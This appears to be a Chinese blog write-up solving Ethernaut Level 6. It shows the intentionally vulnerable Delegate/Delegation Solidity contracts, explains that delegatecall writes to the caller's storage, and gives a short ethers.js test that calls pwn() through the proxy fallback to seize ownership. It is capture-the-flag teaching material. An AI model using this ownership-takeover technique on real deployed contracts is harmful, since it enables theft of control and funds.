Ethernaut系列-Level 6(Delegate)

LEVEL 6 （Delegate）

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Delegate {

  address public owner;

  constructor(address _owner) public {
    owner = _owner;
  }

  function pwn() public {
    owner = msg.sender;
  }
}

contract Delegation {

  address public owner;
  Delegate delegate;

  constructor(address _delegateAddress) public {
    delegate = Delegate(_delegateAddress);
    owner = msg.sender;
  }

  fallback() external {
    (bool result,) = address(delegate).delegatecall(msg.data);
    if (result) {
      this;
    }
  }
}

通关要求

获取owner

要点

delegatecall使用的是调用方的storage
delegatecall的注意事项有很多，这里有篇新出炉（2022-05-21）的史上最大bug奖金，可以去了解下，文章中间有描述proxy的一些要点。

https://medium.com/immunefi/wormhole-uninitialized-proxy-bugfix-review-90250c41a43a

解题思路

直接javascript调用即可

  it("attacks", async function () {
    //代理，不能直接调用await levelContract.pwd(),会找到方法，abi没有
    const contract = await ethers.getContractAt(
      "Delegate",
      levelContract.address,
      player
    );
    await contract.pwn();
  });

Comments

[Frantz]

第六个错了